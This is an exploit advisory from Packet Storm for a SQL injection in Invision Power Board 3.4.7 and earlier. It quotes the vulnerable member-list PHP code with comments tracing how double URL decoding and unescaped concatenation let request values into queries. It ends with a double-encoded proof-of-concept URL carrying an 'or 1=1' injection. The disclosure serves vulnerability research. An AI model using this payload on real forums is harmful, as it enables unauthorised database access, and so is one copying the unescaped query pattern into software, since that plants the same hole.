Invision Power Board 3.4.7 SQL Injection

2015-05-29T00:00:00
ID PACKETSTORM:132087
Type packetstorm
Reporter ZeroDay
Modified 2015-05-29T00:00:00

Description

                                        
                                            `  
# Exploit Title: Invision Power Board <= 3.4.7 SQL Injection  
# Date: 29.05.2015  
# Exploit Author: ZeroDay  
# Software Link: http://www.invisionpower.com/  
# Version: <= 3.4.7  
# Tested on: 3.4.7  
# About: For the G-Owl with Love  
Vulnerable code (excerpt from the file below):
admin/applications/members/modules_public/list/view.php  
//-----------------------------------------
// Custom fields?
//
// Builds the per-custom-field WHERE fragments for the member list from
// request parameters named field_<id>. Every value concatenated into
// $query below originates in $this->request, and nothing in this block
// escapes, casts or parameterises it before it lands in the SQL string.
//-----------------------------------------
if ( count( $this->custom_fields->out_fields ) )
{
    foreach( $this->custom_fields->out_fields as $id => $data )
    {
        // empty() also rejects '0', so a field filtered on "0" is silently ignored.
        if ( !empty($this->request[ 'field_' . $id ]) )
        {
            // Set but never read inside this block; presumably signals to the
            // caller that at least one custom-field filter is active.
            $_queryPP = true;

            // Second round of URL decoding. The values in $this->request have
            // presumably already been decoded once on the way in, so any %27 / %25
            // that survived that first pass becomes a literal ' or % here — this is
            // the step that lets the double-encoded PoC on this page reach the SQL
            // below intact. $url keeps the still-encoded original for link building.
            if( is_array($this->request[ 'field_' . $id ]) )
            {
                foreach( $this->request[ 'field_' . $id ] as $k => $v )
                {
                    $this->request[ 'field_' . $id ][ $k ] = urldecode($v);
                    $url['field_' . $id] = "field_{$id}[{$k}]=" . $v;
                }
            }
            else
            {
                $url['field_' . $id] = "field_{$id}=" . $this->request[ 'field_' . $id ];
                $this->request[ 'field_' . $id ] = urldecode($this->request[ 'field_' . $id ]);
            }

            if( $this->custom_fields->cache_data[ $id ]['pf_type'] == 'drop' )
            {
                // Drop-down: the decoded request value is spliced into a quoted SQL
                // literal with no escaping, so an embedded ' terminates the literal.
                $query[] = "p.field_{$id}='" . $this->request[ 'field_' . $id ] . "'";
            }
            else if( $this->custom_fields->cache_data[ $id ]['pf_type'] == 'cbox' )
            {
                // NOTE(review): count() is applied to the request value without an
                // is_array() check; a scalar field_<id> for a cbox field would reach it.
                if ( count( $this->request[ 'field_' . $id ] ) )
                {
                    // Checkbox sets interpolate the array *keys* $k, which were not
                    // passed through urldecode above and come straight from the request,
                    // again without escaping.
                    if ( $this->custom_fields->cache_data[ $id ]['pf_search_type'] == 'loose' )
                    {
                        // loose: any one of the checked options may match (OR-ed group)
                        $cboxFields = array();
                        foreach ( $this->request[ 'field_' . $id ] as $k => $v )
                        {
                            $cboxFields[] = "p.field_{$id} LIKE '%|{$k}|%'";
                        }

                        $query[] = "( " . implode( ' OR ', $cboxFields ) . " )";
                    }
                    else
                    {
                        // strict: one $query entry per checked option (combined outside this block)
                        foreach ( $this->request[ 'field_' . $id ] as $k => $v )
                        {
                            $query[] = "p.field_{$id} LIKE '%|{$k}|%'";
                        }
                    }
                }
            }
            else
            {
                // Free-text fields: LIKE '%value%' for loose search, exact match otherwise.
                // Same unescaped concatenation as the 'drop' branch; a safe version would
                // also need LIKE-specific escaping of % and _ in the loose form.
                $query[] = $this->custom_fields->cache_data[ $id ]['pf_search_type'] == 'loose' ? "p.field_{$id} LIKE '%" . $this->request[ 'field_' . $id ] . "%'" : "p.field_{$id} = '" . $this->request[ 'field_' . $id ] . "'";
            }
        }
    }
}
......  
POC  
index.php?/members/?field_1=admin%2525%2527%2Bor%2B1%253D1--%2B1  
`